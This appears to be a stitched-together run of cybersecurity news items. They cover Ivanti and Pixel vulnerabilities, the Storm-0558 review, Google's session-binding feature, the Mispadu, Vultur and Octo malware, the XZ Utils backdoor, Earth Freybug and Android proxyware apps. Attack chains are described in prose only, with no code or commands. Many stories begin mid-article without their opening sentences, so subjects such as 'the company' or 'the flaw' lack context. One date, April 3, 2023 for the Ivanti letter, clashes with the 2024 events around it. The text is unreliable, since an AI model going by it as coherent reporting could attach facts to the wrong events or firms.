Late last month, Ivanti shipped patches for critical shortcoming in its
Standalone Sentry product (CVE-2023-41724, CVSS score: 9.6) that could permit an
unauthenticated threat actor to execute arbitrary commands on the underlying
operating system.
It also resolved another critical flaw impacting on-premises versions of Neurons
for ITSM (CVE-2023-46808, CVSS score: 9.9) that an authenticated remote attacker
could abuse in order to perform arbitrary file writes and obtain code execution.
In an open letter published on April 3, 2023, Ivanti's CEO Jeff Abbott said the
company is taking a "close look" at its own posture and processes to meet the
requirements of the current threat landscape.
Abbott also said "events in recent months have been humbling" and that it's
executing a plan that essentially changes its security operating model by
adopting secure-by-design principles, sharing information with customers with
complete transparency, and rearchitecting its engineering, security, and
vulnerability management practices.
"We are intensifying our internal scanning, manual exploitation and testing
capabilities, engaging trusted third parties to augment our internal research
and facilitating responsible disclosure of vulnerabilities with increased
incentives around an enhanced bug bounty program," Abbott said.
The high-severity zero-day vulnerabilities are as follows -
CVE-2024-29745 - An information disclosure flaw in the bootloader component
CVE-2024-29748 - A privilege escalation flaw in the firmware component "There
are indications that the [vulnerabilities] may be under limited, targeted
exploitation," Google said in an advisory published April 2, 2024.
While the tech giant did not reveal any other information about the nature of
the attacks exploiting these shortcomings, the maintainers of GrapheneOS said
they "are being actively exploited in the wild by forensic companies."
"CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to
support unlocking/flashing/locking," they said in a series of posts on X
(formerly Twitter).
"Forensic companies are rebooting devices in After First Unlock state into
fastboot mode on Pixels and other devices to exploit vulnerabilities there and
then dump memory."
GrapheneOS noted that CVE-2024-29748 could be weaponized by local attackers to
interrupt a factory reset triggered via the device admin API.
The disclosure comes more than two months after the GrapheneOS team revealed
that forensic companies are exploiting firmware vulnerabilities that impact
Google Pixel and Samsung Galaxy phones to steal data and spy on users when the
device is not at rest.
It also urged Google to introduce an auto-reboot feature to make exploitation of
firmware flaws more difficult.
The findings, released by the Department of Homeland Security (DHS) on Tuesday,
found that the intrusion was preventable, and that it became successful due to a
"cascade of Microsoft's avoidable errors."
"It identified a series of Microsoft operational and strategic decisions that
collectively pointed to a corporate culture that deprioritized enterprise
security investments and rigorous risk management, at odds with the company's
centrality in the technology ecosystem and the level of trust customers place in
the company to protect their data and operations," the DHS said in a statement.
The CSRB also lambasted the tech titan for failing to detect the compromise on
its own, instead relying on a customer to reach out to flag the breach. It
further faulted Microsoft for not prioritizing the development of an automated
key rotation solution and rearchitecting its legacy infrastructure to meet the
needs of the current threat landscape.
The incident first came to light in July 2023 when Microsoft revealed that
Storm-0558 gained unauthorized access to 22 organizations as well as more than
more than 500 related individual consumer accounts.
Microsoft subsequently said a validation error in its source code made it
possible for Azure Active Directory (Azure AD) tokens to be forged by Storm-0558
using a Microsoft account (MSA) consumer signing key, thus allowing the
adversary to infiltrate the mailboxes.
In September 2023, the company divulged that Storm-0558 acquired the consumer
signing key to forge the tokens by compromising an engineer's corporate account
that had access to a debugging environment hosting a crash dump of its consumer
signing system that also inadvertently contained the signing key.
Microsoft has since acknowledged in a March 2024 update that it was inaccurate
and that it has not still been able to locate a "crash dump containing the
impacted key material." It also said its investigation into the hack remains
ongoing.
"Our leading hypothesis remains that operational errors resulted in key material
leaving the secure token signing environment that was subsequently accessed in a
debugging environment via a compromised engineering account," it noted.
"Recent events have demonstrated a need to adopt a new culture of engineering
security in our own networks," a Microsoft spokesperson was quoted as saying to
The Washington Post.
As many as 60,000 unclassified emails from Outlook accounts are believed to have
been exfiltrated over the course of the campaign that began in May 2023. China
has rejected accusations that it was behind the attack.
Earlier this February, Redmond expanded free logging capabilities to all U.S.
federal agencies using Microsoft Purview Audit, irrespective of the license
tier, to help them detect, respond, and prevent sophisticated cyber attacks.
"The threat actor responsible for this brazen intrusion has been tracked by
industry for over two decades and has been linked to 2009 Operation Aurora and
2011 RSA SecureID compromises," said CSRB Acting Deputy Chair Dmitri
Alperovitch.
"This People's Republic of China affiliated group of hackers has the capability
and intent to compromise identity systems to access sensitive data, including
emails of individuals of interest to the Chinese government."
To safeguard against threats from state-sponsored actors, cloud service
providers have been recommended to -
Implement modern control mechanisms and baseline practices Adopt a minimum
standard for default audit logging in cloud services Incorporate emerging
digital identity standards to secure cloud services Adopt incident and
vulnerability disclosure practices to maximize transparency Develop more
effective victim notification and support mechanisms to drive
information-sharing efforts "The United States government should update the
Federal Risk Authorization Management Program and supporting frameworks and
establish a process for conducting discretionary special reviews of the
program's authorized Cloud Service Offerings following especially high-impact
situations," the CSRB said.
The prototype – currently tested against "some" Google Account users running
Chrome Beta – is built with an aim to make it an open web standard, the tech
giant's Chromium team said.
"By binding authentication sessions to the device, DBSC aims to disrupt the
cookie theft industry since exfiltrating these cookies will no longer have any
value," the company noted.
"We think this will substantially reduce the success rate of cookie theft
malware. Attackers would be forced to act locally on the device, which makes
on-device detection and cleanup more effective, both for anti-virus software as
well as for enterprise managed devices."
The development comes on the back of reports that off-the-shelf information
stealing malware are finding ways to steal cookies in a manner that allows
threat actors to bypass multi-factor authentication (MFA) protection and gain
unauthorized access to online accounts.
Such session hijacking techniques are not new. In October 2021, Google's Threat
Analysis Group (TAG) detailed a phishing campaign that targeted YouTube content
creators with cookie stealing malware to hijack their accounts and monetize the
access for perpetrating cryptocurrency scams.
Earlier this January, CloudSEK revealed that information stealers like Lumma,
Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake have updated their
capabilities to hijack user sessions and allow continuous access to Google
services even after a password reset.
Google told The Hacker News at the time that "attacks involving malware that
steal cookies and tokens are not new; we routinely upgrade our defenses against
such techniques and to secure users who fall victim to malware."
It further recommended users to enable Enhanced Safe Browsing in the Chrome web
browser to protect against phishing and malware downloads.
DBSC aims to cut down on such malicious efforts by introducing a cryptographic
approach that ties together the sessions to the device such that it makes it
harder for the adversaries to abuse the stolen cookies and hijack the accounts.
Offered via an API, the new feature achieves this by allowing a server to
associate a session with a public key created by the browser as part of a
public/private key pair when a new session is launched.
It's worth noting that the key pair is stored locally on the device using
Trusted Platform Modules (TPMs). In addition, the DBSCI API permits the server
to verify proof-of-possession of the private key throughout the session lifetime
to ensure the session is active on the same device.
"DBSC offers an API for websites to control the lifetime of such keys, behind
the abstraction of a session, and a protocol for periodically and automatically
proving possession of those keys to the website's servers," Google's Kristian
Monsen and Arnar Birgisson said.
"There is a separate key for each session, and it should not be possible to
detect that two different session keys are from one device. By device-binding
the private key and with appropriate intervals of the proofs, the browser can
limit malware's ability to offload its abuse off of the user's device,
significantly increasing the chance that either the browser or server can detect
and mitigate cookie theft."
One crucial caveat is that DBSC banks on user devices having a secure way of
signing challenges while protecting private keys from exfiltration by malware,
necessitating that the web browser has access to the TPM.
Google said support for DBSC will be initially rolled out to roughly half of
Chrome's desktop users based on the hardware capabilities of their machines. The
latest project is also expected to be in sync with the company's broader plans
to sunset third-party cookies in the browser by the end of the year via the
Privacy Sandbox initiative.
"This is to make sure that DBSC does not become a new tracking vector once
third-party cookies are phased out, while also ensuring that such cookies can be
fully protected in the meantime," it said. "If the user completely opts out of
cookies, third-party cookies, or cookies for a specific site, this will disable
DBSC in those scenarios as well."
The company further noted that it's engaging with several server providers,
identity providers (IdPs), and browser vendors like Microsoft Edge and Okta, who
have expressed interest in DBSC. Origin trials for DBSC for all supported
websites are set to commence by the end of the year.
The banking trojan known as Mispadu has expanded its focus beyond Latin America
(LATAM) and Spanish-speaking individuals to target users in Italy, Poland, and
Sweden.
Targets of the ongoing campaign include entities spanning finance, services,
motor vehicle manufacturing, law firms, and commercial facilities, according to
Morphisec.
"Despite the geographic expansion, Mexico remains the primary target," security
researcher Arnold Osipov said in a report published last week.
"The campaign has resulted in thousands of stolen credentials, with records
dating back to April 2023. The threat actor leverages these credentials to
orchestrate malicious phishing emails, posing a significant threat to
recipients."
Mispadu, also called URSA, came to light in 2019, when it was observed carrying
out credential theft activities aimed at financial institutions in Brazil and
Mexico by displaying fake pop-up windows. The Delphi-based malware is also
capable of taking screenshots and capturing keystrokes.
Typically distributed via spam emails, recent attack chains have leveraged a
now-patched Windows SmartScreen security bypass flaw (CVE-2023-36025, CVSS
score: 8.8) to compromise users in Mexico.
The infection sequence analyzed by Morphisec is a multi-stage process that
commences with a PDF attachment present in invoice-themed emails that, when
opened, prompts the recipient to click on a booby-trapped link to download the
complete invoice, resulting in the download of a ZIP archive.
The ZIP comes with either an MSI installer or an HTA script that's responsible
for retrieving and executing a Visual Basic Script (VBScript) from a remote
server, which, in turn, downloads a second VBScript that ultimately downloads
and launches the Mispadu payload using an AutoIT script but after it's decrypted
and injected into memory by means of a loader.
"This [second] script is heavily obfuscated and employs the same decryption
algorithm as mentioned in the DLL," Osipov said.
"Before downloading and invoking the next stage, the script conducts several
Anti-VM checks, including querying the computer's model, manufacturer, and BIOS
version, and comparing them to those associated with virtual machines."
The Mispadu attacks are also characterized by the use of two distinct
command-and-control (C2) servers, one for fetching the intermediate and
final-stage payloads and another for exfiltrating the stolen credentials from
over 200 services. There are currently more than 60,000 files in the server.
The development comes as the DFIR Report detailed a February 2023 intrusion that
entailed the abuse of malicious Microsoft OneNote files to drop IcedID, using it
to drop Cobalt Strike, AnyDesk, and the Nokoyawa ransomware.
Microsoft, exactly a year ago, announced that it would start blocking 120
extensions embedded within OneNote files to prevent its abuse for malware
delivery.
YouTube Videos for Game Cracks Serve Malware# The findings also come as
enterprise security firm Proofpoint said several YouTube channels promoting
cracked and pirated video games are acting as a conduit to deliver information
stealers such as Lumma Stealer, Stealc, and Vidar by adding malicious links to
video descriptions.
"The videos purport to show an end user how to do things like download software
or upgrade video games for free, but the link in the video descriptions leads to
malware," security researcher Isaac Shaughnessy said in an analysis published
today.
There is evidence to suggest that such videos are posted from compromised
accounts, but there is also the possibility that the threat actors behind the
operation have created short-lived accounts for dissemination purposes.
All the videos include Discord and MediaFire URLs that point to
password-protected archives that ultimately lead to the deployment of the
stealer malware.
Proofpoint said it identified multiple distinct activity clusters propagating
stealers via YouTube with an aim to single out non-enterprise users. The
campaign has not been attributed to a single threat actor or group.
"The techniques used are similar, however, including the use of video
descriptions to host URLs leading to malicious payloads and providing
instructions on disabling antivirus, and using similar file sizes with bloating
to attempt to bypass detections," Shaughnessy said.
The flaw, designated as CVE-2024-2879, carries a CVSS score of 9.8 out of a
maximum of 10.0. It has been described as a case of SQL injection impacting
versions from 7.9.11 through 7.10.0.
The issue has been addressed in version 7.10.1 released on March 27, 2024,
following responsible disclosure on March 25. "This update includes important
security fixes," the maintainers of LayerSlider said in their release notes.
LayerSlider is a visual web content editor, a graphic design software, and a
digital visual effects that allows users to create animations and rich content
for their websites. According to its own site, the plugin is used by "millions
of users worldwide."
The flaw discovered in the tool stems from a case of insufficient escaping of
user supplied parameters and the absence of wpdb::prepare(), enabling
unauthenticated attackers to append additional SQL queries and glean sensitive
information, Wordfence said.
The development follows the discovery of an unauthenticated stored cross-site
scripting (XSS) flaw in the WP-Members Membership Plugin (CVE-2024-1852, CVSS
score: 7.2) that could facilitate the execution of arbitrary JavaScript code. It
has been resolved in version 3.4.9.3.
The vulnerability, due to insufficient input sanitization and output escaping,
"makes it possible for unauthenticated attackers to inject arbitrary web scripts
in pages that will execute whenever a user accesses an injected page which is
the edit users page," the WordPress security company said.
Should the code be executed in the context of an administrator's browser
session, it can be used to create rogue user accounts, redirect site visitors to
other malicious sites, and carry out other attacks, it added.
Over the past few weeks, security vulnerabilities have also been disclosed in
other WordPress plugins such as Tutor LMS (CVE-2024-1751, CVSS score: 8.8) and
Contact Form Entries (CVE-2024-2030, CVSS score: 6.4) that could be exploited
for information disclosure and injecting arbitrary web scripts, respectively.
The audacious supply chain compromise, tracked as CVE-2024-3094 (CVSS score:
10.0), came to light last week when Microsoft engineer and PostgreSQL developer
Andres Freund alerted to the presence of a backdoor in the data compression
utility that gives remote attackers a way to sidestep secure shell
authentication and gain complete access to an affected system.
XZ Utils is a command-line tool for compressing and decompressing data in Linux
and other Unix-like operating systems.
The malicious code is said to have been deliberately introduced by one of the
project maintainers named Jia Tan (aka Jia Cheong Tan or JiaT75) in what appears
to be a meticulous attack spanning multiple years. The GitHub user account was
created in 2021. The identity of the actor(s) is presently unknown.
"The threat actor started contributing to the XZ project almost two years ago,
slowly building credibility until they were given maintainer responsibilities,"
Akamai said in a report.
In a further act of clever social engineering, sockpuppet accounts like Jigar
Kumar and Dennis Ens are believed to have been used to send feature requests and
report a variety of issues in the software in order to force the original
maintainer – Lasse Collin of the Tukaani Project – to add a new co-maintainer to
the repository.
Enter Jia Tan, who introduced a series of changes to XZ Utils in 2023, which
eventually made their way to release version 5.6.0 in February 2024. They also
harbored a sophisticated backdoor.
Source: Thomas Roccia "As I have hinted in earlier emails, Jia Tan may have a
bigger role in the project in the future," Collin said in an exchange with Kumar
in June 2022.
"He has been helping a lot off-list and is practically a co-maintainer already.
:-) I know that not much has happened in the git repository yet but things
happen in small steps. In any case some change in maintainership is already in
progress at least for XZ Utils."
The backdoor affects XZ Utils 5.6.0 and 5.6.1 release tarballs, the latter of
which contains an improved version of the same implant. Collins has since
acknowledged the project's breach, stating both the tarballs were created and
signed by Jia Tan and that they had access only to the now-disabled GitHub
repository.
"This is clearly a very complex state-sponsored operation with impressive
sophistication and multi-year planning," firmware security company Binarly said.
"Such a complex and professionally designed comprehensive implantation framework
is not developed for a one-shot operation."
A deeper examination of the backdoor by open-source cryptographer Filippo
Valsorda has also revealed that the affected versions allow specific remote
attackers to send arbitrary payloads through an SSH certificate which will be
executed in a manner that circumvents authentication protocols, effectively
seizing control over the victim machine.
"It appears as though the backdoor is added to the SSH daemon on the vulnerable
machine, enabling a remote attacker to execute arbitrary code," Akamai said.
"This means that any machine with the vulnerable package that exposes SSH to the
internet is potentially vulnerable."
Needless to say, the accidental discovery by Freund is one of the most
significant supply chain attacks discovered to date and could have been a severe
security disaster had the package been integrated into stable releases of Linux
distributions.
"The most notable part of this supply chain attack is the extreme levels of
dedication of the attacker, working more than two years to establish themselves
as a legitimate maintainer, offering to pick up work in various OSS projects and
committing code across multiple projects in order to avoid detection," JFrog
said.
As with the case of Apache Log4j, the incident once again highlights the
reliance on open-source software and volunteer-run projects, and the
consequences that could entail should they suffer a compromise or have a major
vulnerability.
"The bigger 'fix' is for organizations to adopt tools and processes that allow
them to identify signs of tampering and malicious features within both open
source and commercial code used in their own development pipeline,"
ReversingLabs said.
"Earth Freybug is a cyberthreat group that has been active since at least 2012
that focuses on espionage and financially motivated activities," Trend Micro
security researcher Christopher So said in a report published today.
"It has been observed to target organizations from various sectors across
different countries."
The cybersecurity firm has described Earth Freybug as a subset within APT41, a
China-linked cyber espionage group that's also tracked as Axiom, Brass Typhoon
(formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti.
The adversarial collective is known to rely on a combination of
living-off-the-land binaries (LOLBins) and custom malware to realize its goals.
Also adopted are techniques like dynamic-link library (DLL) hijacking and
application programming interface (API) unhooking.
Trend Micro said the activity shares tactical overlaps with a cluster previously
disclosed by cybersecurity company Cybereason under the name Operation
CuckooBees, which refers to an intellectual property theft campaign targeting
technology and manufacturing companies located in East Asia, Western Europe, and
North America.
The starting point of the attack chain is the use of a legitimate executable
associated with VMware Tools ("vmtoolsd.exe") to create a scheduled task using
"schtasks.exe" and deploy a file named "cc.bat" in the remote machine.
It's currently not known how the malicious code came to be injected in
vmtoolsd.exe, although it's suspected that it may have involved the exploitation
of external-facing servers.
The batch script is designed to amass system information and launch a second
scheduled task on the infected host, which, in turn, executes another batch file
with the same name ("cc.bat") to ultimately run the UNAPIMON malware.
"The second cc.bat is notable for leveraging a service that loads a non-existent
library to side-load a malicious DLL," So explained. "In this case, the service
is SessionEnv."
This paves the way for the execution of TSMSISrv.DLL that's responsible for
dropping another DLL file (i.e., UNAPIMON) and injecting that same DLL into
cmd.exe. Simultaneously, the DLL file is also injected into SessionEnv for
defense evasion.
On top of that, the Windows command interpreter is designed to execute commands
coming from another machine, essentially turning it into a backdoor.
A simple C++-based malware, UNAPIMON is equipped to prevent child processes from
being monitored by leveraging an open-source Microsoft library called Detours to
unhook critical API functions, thereby evading detection in sandbox environments
that implement API monitoring through hooking.
The cybersecurity company characterized the malware as original, calling out the
author's "coding prowess and creativity" as well as their use of an
off-the-shelf library to carry out malicious actions.
"Earth Freybug has been around for quite some time, and their methods have been
seen to evolve through time," Trend Micro said.
"This attack also demonstrates that even simple techniques can be used
effectively when applied correctly. Implementing these techniques to an existing
attack pattern makes the attack more difficult to discover."
Google has agreed to purge billions of data records reflecting users' browsing
activities to settle a class action lawsuit that claimed the search giant
tracked them without their knowledge or consent in its Chrome browser.
The class action, filed in 2020, alleged the company misled users by tracking
their internet browsing activity who thought that it remained private when using
the "incognito" or "private" mode on web browsers like Chrome.
In late December 2023, it emerged that the company had consented to settle the
lawsuit. The deal is currently pending approval by the U.S. District Judge
Yvonne Gonzalez Rogers.
"The settlement provides broad relief regardless of any challenges presented by
Google's limited record keeping," a court filing on April 1, 2024, said.
"Much of the private browsing data in these logs will be deleted in their
entirety, including billions of event level data records that reflect class
members' private browsing activities."
As part of the data remediation process, Google is also required to delete
information that makes private browsing data identifiable by redacting data
points like IP addresses, generalizing User-Agent strings, and remove detailed
URLs within a specific website (i.e., retain only domain-level portion of the
URL).
In addition, it has been asked to delete the so-called X-Client-Data header
field, which Google described as a Chrome-Variations header that captures the
"state of the installation of Chrome itself, including active variations, as
well as server-side experiments that may affect the installation."
This header is generated from a randomized seed value, making it potentially
unique enough to identify specific Chrome users.
Other settlement terms require Google to block third-party cookies within
Chrome's Incognito Mode for five years, a setting the company has already
implemented for all users. The tech company has separately announced plans to
eliminate tracking cookies by default by the end of the year.
Google has since also updated the wording of Incognito Mode as of January 2024
to clarify that the setting will not change "how data is collected by websites
you visit and the services they use, including Google."
The lawsuit extracted admissions from Google employees that characterized the
browser's Incognito browsing mode as a "confusing mess," "effectively a lie,"
and a "problem of professional ethics and basic honesty."
It further laid bare internal exchanges in which executives argued Incognito
Mode shouldn't be called "private" because it risked "exacerbating known
misconceptions."
The development comes as Google said it has started automatically blocking bulk
senders in Gmail that don't meet its Email sender guidelines in an attempt to
cut down on spam and phishing attacks.
The new requirements make it mandatory for email senders who push out more than
5,000 messages per day to Gmail accounts to provide a one-click unsubscribe
option and respond to unsubscription requests within two days.
The threat actor known as TA558 has been attributed to a new massive phishing
campaign that targets a wide range of sectors in Latin America with the goal of
deploying Venom RAT.
The attacks primarily singled out hotel, travel, trading, financial,
manufacturing, industrial, and government verticals in Spain, Mexico, United
States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
Active since at least 2018, TA558 has a history of targeting entities in the
LATAM region to deliver a variety of malware such as Loda RAT, Vjw0rm, and
Revenge RAT.
The latest infection chain, according to Perception Point researcher Idan Tarab,
leverages phishing emails as an initial access vector to drop Venom RAT, a fork
of Quasar RAT that comes with capabilities to harvest sensitive data and
commandeer systems remotely.
The disclosure comes as threat actors have been increasingly observed using the
DarkGate malware loader following the law enforcement takedown of QakBot last
year to target financial institutions in Europe and the U.S.
"Ransomware groups utilize DarkGate to create an initial foothold and to deploy
various types of malware in corporate networks," EclecticIQ researcher Arda
Büyükkaya noted.
"These include, but are not limited to, info-stealers, ransomware, and remote
management tools. The objective of these threat actors is to increase the number
of infected devices and the volume of data exfiltrated from a victim."
It also follows the emergence of malvertising campaigns designed to deliver
malware like FakeUpdates (aka SocGholish), Nitrogen, and Rhadamanthys.
Earlier this month, Israeli ad security company GeoEdge revealed that a
notorious malvertising group tracked as ScamClub "has shifted its focus towards
video malvertising assaults, resulting in a surge in VAST-forced redirect
volumes since February 11, 2024."
The attacks entail the malicious use of Video Ad Serving Templates (VAST) tags –
which are used for video advertising – to redirect unsuspecting users to
fraudulent or scam pages but only upon successful passage of certain client-side
and server-side fingerprinting techniques.
A majority of the victims are located in the U.S. (60.5%), followed by Canada
(7.2%), the U.K. (4.8%), Germany (2.1%), and Malaysia (1.7%), among others.
The Indian nationals "were lured with employment opportunities to that country
but were forced to undertake illegal cyber work," the Ministry of External
Affairs (MEA) said in a statement, adding it had rescued 75 people in the past
three months.
It also said it's working with "with Cambodian authorities and with agencies in
India to crack down on those responsible for these fraudulent schemes."
The development comes in the wake of a report from the Indian Express that said
more than 5,000 Indians stuck in Cambodia were forced into "cyber slavery" by
organized crime rackets to scam people in India and extort money by masquerading
as law enforcement authorities in some cases.
The report also tracks with an earlier disclosure from INTERPOL, which
characterized the situation as human trafficking-fuelled fraud on an industrial
scale.
This included an accountant from the state of Telangana, who was "lured to
Southeast Asia where he was forced to participate in online fraud schemes in
inhuman conditions." He was subsequently let go after paying a ransom.
In another instance highlighted by the Indian Express, one of the rescued men
was recruited by an agent from the south Indian city of Mangaluru for a data
entry job, only to be asked to create fake social media accounts with
photographs of women and use them to contact people.
"We had targets and if we didn't meet those, they would not give us food or
allow us into our rooms," the individual, identified only as Stephen, was quoted
as saying.
China and the Philippines have undertaken similar efforts to free hundreds of
Filipinos, Chinese, and other foreign nationals who were entrapped and forced
into criminal activity, running what's called pig butchering scams.
These schemes typically start with the scammer adopting a bogus identity to lure
prospective victims into investing in non-existing crypto businesses that are
designed to steal their funds. The fraudsters are known to gain their target's
trust under the illusion of a romantic relationship.
In a report published in February 2024, Chainalysis said the cryptocurrency
wallets associated with one of the pig butchering gangs operating out of Myanmar
has recorded close to $100 million in crypto inflows, some of which is also
estimated to include the ransom payments made by the families of trafficked
workers.
"The brutal conditions trafficking victims face on the compounds also lend
additional urgency to solving the problem of romance scamming — not only are
consumers being bilked out of hundreds of millions of dollars each year, but the
gangs behind those scams are also perpetuating a humanitarian crisis," the
blockchain analytics firm said.
News of the rescue efforts also follow research from Check Point that threat
actors are exploiting a function in Ethereum called CREATE2 to bypass security
measures and gain unauthorized access to funds. Details of the scam were
previously disclosed by Scam Sniffer in November 2023.
The crux of the technique is the use of CREATE2 to generate a new "temporary"
wallet address that has no history of being reported for criminal activity, thus
allowing threat actors to make the illicit transactions to the address once the
victim approves the contract and circumvent protections that flag such
addresses.
"The attack method involves tricking users into approving transactions for smart
contracts that haven't been deployed yet, allowing cyber criminals to later
deploy malicious contracts and steal cryptocurrencies," the Israeli company
said.
Several malicious Android apps that turn mobile devices running the operating
system into residential proxies (RESIPs) for other threat actors have been
observed on the Google Play Store.
The findings come from HUMAN's Satori Threat Intelligence team, which said the
cluster of VPN apps came fitted with a Golang library that transformed the
user's device into a proxy node without their knowledge.
The operation has been codenamed PROXYLIB by the company. The 29 apps in
question have since been removed by Google.
Residential proxies are a network of proxy servers sourced from real IP
addresses provided by internet service providers (ISPs), helping users hide
their actual IP addresses by routing their internet traffic through an
intermediary server.
The anonymity benefits aside, they are ripe for abuse by threat actors to not
only obfuscate their origins, but also to conduct a wide range of attacks.
"When a threat actor uses a residential proxy, the traffic from these attacks
appears to be coming from different residential IP addresses instead of an IP of
a data center or other parts of a threat actor's infrastructure," security
researchers said. "Many threat actors purchase access to these networks to
facilitate their operations."
Some of these networks can be created by malware operators tricking unsuspecting
users into installing bogus apps that essentially corral the devices into a
botnet that's then monetized for profit by selling the access to other
customers.
The Android VPN apps discovered by HUMAN are designed to establish contact with
a remote server, enroll the infected device to the network, and process any
request from the proxy network.
Another notable aspect of these apps is that a subset of them identified between
May and October 2023 incorporate a software development kit (SDK) from LumiApps,
which contains the proxyware functionality. In both cases, the malicious
capability is pulled off using a native Golang library.
LumiApps also offers a service that essentially permits users to upload any APK
file of their choice, including legitimate applications, and bundle the SDK to
it without having to create a user account, which can then be re-downloaded and
shared with others.
"LumiApps helps companies gather information that is publicly available on the
internet," the Israeli company says on its website. "It uses the user's IP
address to load several web pages in the background from well-known websites."
"This is done in a way that never interrupts the user and fully complies with
GDPR/CCPA. The web pages are then sent to companies, who use them to improve
their databases, offering better products, services, and pricing."
These modified apps – called mods – are then distributed in and out of the
Google Play Store. LumiApps promotes itself and the SDK as an alternative app
monetization method to rendering ads.
There is evidence indicating that the threat actor behind PROXYLIB is selling
access to the proxy network created by the infected devices through LumiApps and
Asocks, a company that advertises itself as a seller of residential proxies.
What's more, in an effort to bake the SDK into as many apps as possible and
expand the size of the botnet, LumiApps offers cash rewards to developers based
on the amount of traffic that gets routed through user devices that have
installed their apps. The SDK service is also advertised on social media and
black hat forums.
Recent research published by Orange Cyberdefense and Sekoia characterized
residential proxies as part of a "fragmented yet interconnected ecosystem," in
which proxyware services are advertised in various ways ranging from voluntary
contributions to dedicated shops and reselling channels.
"[In the case of SDKs], the proxyware is often embedded in a product or
service," the companies noted. Users may not notice that proxyware will be
installed when accepting the terms of use of the main application it is embedded
with. This lack of transparency leads to users sharing their Internet connection
without a clear understanding."
The development comes as the Lumen Black Lotus Labs disclosed that end-of-life
(EoL) small home/small office (SOHO) routers and IoT devices are being
compromised by a botnet known as TheMoon to power a criminal proxy service
called Faceless.
"Vultur has also started masquerading more of its malicious activity by
encrypting its C2 communication, using multiple encrypted payloads that are
decrypted on the fly, and using the guise of legitimate applications to carry
out its malicious actions," NCC Group researcher Joshua Kamp said in a report
published last week.
Vultur was first disclosed in early 2021, with the malware capable of leveraging
Android's accessibility services APIs to execute its malicious actions.
The malware has been observed to be distributed via trojanized dropper apps on
the Google Play Store, masquerading as authenticator and productivity apps to
trick unwitting users into installing them. These dropper apps are offered as
part of a dropper-as-a-service (DaaS) operation called Brunhilda.
Other attack chains, as observed by NCC Group, involve the droppers being spread
using a combination of SMS messages and phone calls – a technique called
telephone-oriented attack delivery (TOAD) – to ultimately serve an updated
version of the malware.
"The first SMS message guides the victim to a phone call," Kamp said. When the
victim calls the number, the fraudster provides the victim with a second SMS
that includes the link to the dropper: a modified version of the [legitimate]
McAfee Security app."
The initial SMS message aims to induce a false sense of urgency by instructing
the recipients to call a number to authorize a non-existent transaction that
involves a large sum of money.
Upon installation, the malicious dropper executes three related payloads (two
APKs and one DEX file) that register the bot with the C2 server, obtain
accessibility services permissions for remote access via AlphaVNC and ngrok, and
run commands fetched from the C2 server.
One of the prominent additions to Vultur is the ability to remotely interact
with the infected device, including carrying out clicks, scrolls, and swipes,
through Android's accessibility services, as well as download, upload, delete,
install, and find files.
In addition, the malware is equipped to prevent the victims from interacting
with a predefined list of apps, display custom notifications in the status bar,
and even disable Keyguard to bypass lock screen security measures.
"Vultur's recent developments have shown a shift in focus towards maximizing
remote control over infected devices," Kamp said.
"With the capability to issue commands for scrolling, swipe gestures, clicks,
volume control, blocking apps from running, and even incorporating file manager
functionality, it is clear that the primary objective is to gain total control
over compromised devices."
The development comes as Team Cymru revealed the Octo (aka Coper) Android
banking trojan's transition to a malware-as-a-service operation, offering its
services to other threat actors for conducting information theft.
"The malware offers a variety of advanced features, including keylogging,
interception of SMS messages and push notifications, and control over the
device's screen," the company said.
"It employs various injects to steal sensitive information, such as passwords
and login credentials, by displaying fake screens or overlays. Additionally, it
utilizes VNC (Virtual Network Computing) for remote access to devices, enhancing
its surveillance capabilities."
Octo campaigns are estimated to have compromised 45,000 devices, primarily
spanning Portugal, Spain, Turkey, and the U.S. Some of the other victims are
located in France, the Netherlands, Canada, India, and Japan.
The findings also follow the emergence of a new campaign targeting Android users
in India that distributes malicious APK packages posing as online booking,
billing, and courier services via a malware-as-a-service (MaaS) offering.
The malware "targets theft of banking information, SMS messages, and other
confidential information from victims' devices," Broadcom-owned Symantec said in
a bulletin.
McAfee Labs, which shed more light on the ongoing campaign, said the malware has
been embedded in over 800 apps. More than 3,700 Android devices have been
compromised. It attributed the MaaS service to an Indian cyber group named Elvia
Infotech.
"[Scammers] typically contact victims via phone, text, email, or social
applications to inform them that they need to reschedule services," security
researchers ZePeng Chen and Wenfeng Yu said.
"This kind of fraud attack is a typical and effective fraud method. As a result,
victims are asked to download a specific app, and submit personal information.
Once this information falls into the hands of scammers, they can easily steal
funds from the victim’s bank account."
